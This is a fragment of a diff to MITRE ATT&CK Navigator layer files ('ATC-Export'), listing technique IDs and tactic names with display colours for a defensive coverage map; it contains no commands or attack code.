"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1122", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1177", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1011", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0139", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true}
\ No newline at end of file
+{"name": "ATC-Export", "version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1069", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1099", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1091", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1091", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1066", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0195", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0016", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0064", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1041", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0075", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1222", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1054", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1009", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1004", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1146", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0044", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1031", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, 